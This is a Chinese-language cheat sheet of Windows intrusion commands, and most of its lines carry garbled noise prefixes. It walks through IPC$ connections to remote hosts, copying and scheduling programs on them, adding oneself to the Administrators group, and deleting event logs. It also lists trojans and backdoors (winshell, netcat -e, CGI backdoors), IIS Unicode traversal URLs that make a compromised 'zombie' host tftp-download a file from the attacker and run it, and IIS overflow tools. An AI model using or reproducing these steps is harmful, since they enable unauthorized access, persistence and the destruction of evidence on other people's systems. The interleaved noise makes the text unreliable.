网管和黑客都必须知道的命令
m%ec=%L9 常用的几条NET命令:
j^1Yz}6nR W1;QPdz: (与远程主机建立空管连接) net use \\IP地址\ipc$ "" /use:""
634OH*6 [_BQ%7DU (以管理员身份登录远程主机) net use \\IP地址\ipc$ "密码" /use:"Administrator"
?zk#}Ex1 J@}PBHK+ (传送文件到远程主机WINNT目录下)copy 本机目录路径\程序 \\IP地址\admin$
[r#m +R"N 7g7[a/Bts (查看远程主机时间) net time \\IP地址
6 l,8ev z7X,5[P (定时启动某个程序) at \\IP地址 02:18 readme.exe
7 /6Zp? 4 (c{%% (查看共享) net view \\IP地址
{*PbD;/f #c%FpR4 (查看netbios工作组列表) nbtstat -A IP地址
\{EYkk0] Q"vhl2RX (将远程主机C盘映射为自己的F盘) net use f: \\IP地址\c$ ""/user:"Administrator"
|Cm6RH$( cM_!_8o (这两条把自己增加到管理员组): net user 用户名 密码 /add
+RBX2$kB XN&cM,
net localgroup Administrators 用户名 /add
\1ncr4 e"(SlR (断开连接) net use \\IP地址\ipc$ /delete
w/f?KN wJc`^gj 扫尾:
/lS5B6NU -=WQed} del C:\winnt\system32\logfiles\*.*
jO0"`|(]s <kCOg8<y
: del C:\winnt\ssytem32\config\*.evt
JHXtKgFX z&c|2L-u6 del C:\winnt\system32\dtclog\*.*
;#?G2AAv IZ_?1%q>} del C:\winnt\system32\*.log
=E
w<s5C@ ?={S"qK(q del C:\winnt\system32\*.txt
]~:WGo=_ KvH t`
del C:\winnt\*.txt
nv<t$r =D&XE*qkZ del C:\winnt\*.log
/!'Png0! 8ZF!}kb0F 一、netsvc.exe
Ea)=K'Pz I {%Y0S 下面的命令分别是列出主机上的服务项目、查寻和远程启动主机的“时间任务”服务:
RT.
%\))) "Q`Le{ netsvc /list \\IP地址
G1a56TIN~ YB1Jv[ netsvc schedule \\IP地址 /query
O2:1aG %Jji<M] netsvc \\IP地址 schedule /start
;4QE.&s` 0|DyYu 二、OpenTelnet.exe
N*f]NCSi GOsOFs "I 远程启动主机的Telnet服务,并绑定端口到7878,例如:
,<BV5~T.| xpJ=yxO OpenTelnet \\IP地址 用户名 密码 1 7878
V-(*{/^" j+PLtE 然后就可以telnet到主机的7878端口,进入DOS方式下:
7~~suQ{F4 TkR#Kzv380 telnet IP地址 7878
{DD #&B ;$67GK 三、winshell.exe
PLJDRp 2o Ss3~X90!*B 一个非常小的木马(不到6K),telnet到主机的7878端口,输入密码winshell,当看到CMD>后,可打下面的命令:
vScEQS$> 3a[ LM! p Path (查看winshell主程序的路径信息)
?_B'#,tI 8,IQ6Or|-2 b reBoot (重新启动机器)
)3WUyD*UZN x];i?
4 d shutDown (关闭机器)
"rrw~ vq+4so
)/S s Shell (执行后你就会看到可爱的“C:\>”)
M.\XG}RR TBIr^n>Z<k x eXit (退出本次登录会话,此命令并不终止winshell的运行)
!sp`oM Xf[;^?]X CMD>
http://.../srv.exe (通过http下载其他网站上的文件到运行winshell的机器上)
EiDnUL(W7h *a^wYWa 四、3389登陆器,GUI方式登录远程主机的
?[|A sw1t |l-O e 五、elsave.exe
kC ALJRf~d IML.6<,(Z 事件日志清除工具
}G "EdhSl 1(pv3 elsave -s \\IP地址 -l "application" -C
DL#y_;#3_ d)3jkHYEjj elsave -s \\IP地址 -l "system" -C
RG=i74a _f~$iY elsave -s \\IP地址 -l "security" -C
JAM]neKiX ,rjl|F*
T 执行后成功清除应用程序日志,系统日志,安全日志
5|7<ZL3 O)ose?Z
六、hbulot.exe
W7c
B hE
E1i 开启win2kserver和winxp的3389服务
jZQ{XMF "sIww hbulot [/r]
^oYRBEIJH A<^X P-Nrp 使用/r表示安装完成后自动重起目标使设置生效。
@r^s70{} +tlBOl$ 七、nc.exe(netcat.exe)
H]W'mm g{
;OgS3> 一个很好的工具,一些脚本程序都要用到它,也可做溢出后的连接用。
}]M'f:%b 'BUfdb8d 想要连接到某处: nc [-options] hostname port[s] [ports] ...
G^cMY$?99 >l #D9% 绑定端口等待连接: nc -l -p port [-options] [hostname] [port]
"bB0$>0, ,@fx[5{ 参数:
As5-@l`@ Ly/ -e prog 程序重定向,一旦连接,就执行 [危险!!]
Q3Z?Z;2aR Mnk-"d -g gateway source-routing hop point[s], up to 8
`\P1Ff@z0
cml~Oepf -G num source-routing pointer: 4, 8, 12, ...
/MMnW$)
|26[=_[q -h 帮助信息
lD->1=z cv1PiIl -i secs 延时的间隔
U<r!G;^` O)DAYBv^ -l 监听模式,用于入站连接
M]M>z>1*v ^O=G%de -n 指定数字的IP地址,不能用hostname
w ~"%&SNN x3(
->?)D -o file 记录16进制的传输
\3]O?' "',;pGg|K -p port 本地端口号
>$yA
,N ho)JY
$#6 -r 任意指定本地及远程端口
(74y2U6 9~$E+m( -s addr 本地源地址
c<lEFk!g .XkD2~; -u UDP模式
>y,. `ECn 4<vi@,s -v 详细输出——用两个-v可得到更详细的内容
{LVA_7@ wv\V&U$ -w secs timeout的时间
,`OQAJ)> -E3cS -z 将输入输出关掉——用于扫描时
MslgQmlM 八、TFTPD32.EXE
x%O6/rl `8tstWYa]Y 把自己的电脑临时变为一台FTP服务器,让肉鸡来下载文件,tftp命令要在肉鸡上执行,通常要利用Unicode漏洞或telnet到肉鸡,例如:
8^D1u` m`n~-_ http://IP地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c tftp -i 本机IP地址 get 文件名 c:\winnt\system32\文件名
y Tn<5T[H xG(iSuz 然后可以直接令文件运行:
^ fyue~9u KK5_;< http://IP地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c+文件名
00s)=A_ WbBd<^Q 九、prihack.exe是IIS的printer远程缓冲区溢出工具。idqover.exe是溢出idq的,选择“溢出后在一个端口监听”,然后用telnet连接它的监听端口,如果溢出成功,一连它的端口,绑定的命令马上执行。xploit.exe是一个图形界面的ida溢出,成功以后winxp下需要打winxp。
'x<oILOG #6~Bg)7AM 一○、ntis.exe、cmd.exe和cmdasp.asp是三个cgi-backdoor,exe要放到cgi-bin目录下,asp放到有ASP执行权限的目录。然后用IE浏览器连接。
WRA(k yGSZ;BDW:K 一、一 Xscan命令行运行参数说明:
0*9xau{( [Y?Y@x"MZ 在检测过程中,按"[空格]"键可以查看各线程状态及扫描进度,按"q"键保存当前数据后提前退出程序,按"<ctrl+c>"强行关闭程序。
NZ0 ?0* @|sBnerE 1.命令格式: xscan -host <起始IP>[-<终止IP>] <检测项目> [其他选项]
;<